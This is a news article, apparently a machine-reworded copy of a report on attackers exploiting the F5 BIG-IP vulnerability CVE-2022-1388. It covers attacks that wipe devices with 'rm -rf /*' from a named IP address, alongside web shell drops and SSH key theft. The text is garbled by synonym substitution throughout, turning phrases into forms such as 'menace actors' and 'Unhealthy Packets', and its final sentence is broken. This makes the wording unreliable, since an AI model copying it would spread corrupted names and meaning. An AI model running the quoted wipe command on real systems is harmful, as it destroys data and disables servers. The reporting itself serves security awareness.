A just lately revealed F5 BIG-IP vulnerability has been utilized in harmful assaults, which try to wipe a tool’s file system and render the server ineffective.
Final week, F5 disclosed a vulnerability tracked as CVE-2022-1388 that permits attackers to remotely execute instructions on BIG-IP community units as ‘root’ with out authentication. As a result of crucial nature of the bug, F5 urged directors to use updates as quickly as attainable.
A couple of days later, researchers started posting exploits publicly on Twitter and GitHub, and menace actors have been quickly utilizing them in assaults on the Web.
Whereas many of the assaults have been used to drop internet shells for preliminary entry to networks, steal SSH keys, and enumerate system data, SANS Web Storm Middle noticed two assaults focusing on BIG-IP units in a way more nefarious approach.
SANS advised BleepingComputer that their honeypots noticed two assaults coming from IP deal with 177.54.127[.]111 working the command ‘rm -rf /*’ on the goal BIG-IP machine.
This command will try to delete all recordsdata on the Linux file system from the BIG-IP units when run.
As a result of the exploit provides attackers root privileges within the Linux working methods that energy BIG-IP units, the rm -rf /* command can delete nearly any file, together with configuration recordsdata mandatory for the machine to work correctly.
After we revealed our story, safety researcher Kevin Beaumont confirmed that units have been being wiped tonight.
“Can affirm. Actual world units are being wiped tonight, many on Shodan are unresponsive,” tweeted Beaumont.
Thankfully, these harmful assaults don’t seem like widespread, with most menace actors trying to benefit from breaching the units somewhat than inflicting harm.
Cybersecurity menace intelligence companies Unhealthy Packets and GreyNoise advised BleepingComputer that they had not seen any harmful assaults on their honeypots.
GreyNoise researcher kimber stated they often see the exploits drop internet shells, exfiltrate configurations, or run instructions to create administrator accounts on the units.
Whereas the harmful assaults seen by SANS could also be uncommon, the truth that they occur needs to be the one incentive an administrator must replace their units to the most recent patch ranges.
Once we contacted F5 about these harmful assaults, they advised BleepingComputer that they’re in touch with SANS and strongly advise directors to not expose the BIG-IP administration interface to the Web.
“We now have been in touch with SANS and are investigating the difficulty. If prospects haven’t already completed so, we’re urging them to replace to a hard and fast model of BIG-IP or implement one of many measures outlined within the safety advisory. We strongly suggest that prospects by no means expose their BIG-IP administration interface (TMUI) to the general public web and be certain that applicable controls are in place to limit entry.” – F5
It is very important be aware, nevertheless, that Beaumont discovered that assaults additionally have an effect on units on non-management ports if they’re configured incorrectly.
For these affected by assaults on their BIG-IP units, F5 advised BleepingComputer that their Safety Incident Response Staff is accessible 24 hours a day, seven days every week and may be contacted at (888) 882-7535, (800 ) 11-275-435, or on-line.
For F5 BIG-IP directors who have been involved that their units had already been compromised, Sandfly Safety founder Craig Rowland: supply check licenses that enable them to regulate their units.
Replace 5/10/22: Added affirmation from Kevin Beaumont.